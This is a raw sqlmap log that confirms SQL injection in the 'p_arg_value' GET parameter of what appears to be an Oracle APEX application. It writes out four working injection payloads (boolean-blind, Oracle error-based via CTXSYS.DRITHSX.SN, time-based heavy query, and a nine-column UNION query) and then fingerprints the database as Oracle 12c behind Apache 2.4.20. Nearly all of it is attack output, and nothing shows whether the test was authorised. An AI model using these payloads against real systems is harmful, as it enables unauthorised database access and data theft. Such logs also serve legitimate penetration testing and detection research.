...
[00:00:35] [INFO] GET parameter 'p_arg_value' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'p_arg_value' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
---
Parameter: p_arg_value (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p_flow_id=153&p_flow_step_id=5&p_instance=10204457420770&p_arg_name=P7_WHERE_CLAUSE_LS&p_arg_value=and 2=2 AND 7617=7617
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: p_flow_id=153&p_flow_step_id=5&p_instance=10204457420770&p_arg_name=P7_WHERE_CLAUSE_LS&p_arg_value=and 2=2 AND 8387=CTXSYS.DRITHSX.SN(8387,(CHR(113)||CHR(113)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8387=8387) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(113)))
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: p_flow_id=153&p_flow_step_id=5&p_instance=10204457420770&p_arg_name=P7_WHERE_CLAUSE_LS&p_arg_value=and 2=2 AND 9045=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: p_flow_id=153&p_flow_step_id=5&p_instance=10204457420770&p_arg_name=P7_WHERE_CLAUSE_LS&p_arg_value=and 2=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(113)||CHR(120)||CHR(106)||CHR(113)||CHR(103)||CHR(78)||CHR(77)||CHR(77)||CHR(115)||CHR(87)||CHR(81)||CHR(122)||CHR(89)||CHR(87)||CHR(107)||CHR(85)||CHR(106)||CHR(73)||CHR(66)||CHR(115)||CHR(80)||CHR(99)||CHR(72)||CHR(76)||CHR(97)||CHR(88)||CHR(72)||CHR(74)||CHR(89)||CHR(68)||CHR(108)||CHR(113)||CHR(81)||CHR(86)||CHR(87)||CHR(71)||CHR(77)||CHR(98)||CHR(112)||CHR(90)||CHR(65)||CHR(74)||CHR(107)||CHR(97)||CHR(113)||CHR(118)||CHR(122)||CHR(98)||CHR(113),NULL FROM DUAL-- aTFr
---
[00:00:41] [INFO] the back-end DBMS is Oracle
[00:00:41] [INFO] fetching banner
web application technology: Apache 2.4.20
back-end DBMS: Oracle
banner: 'Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production'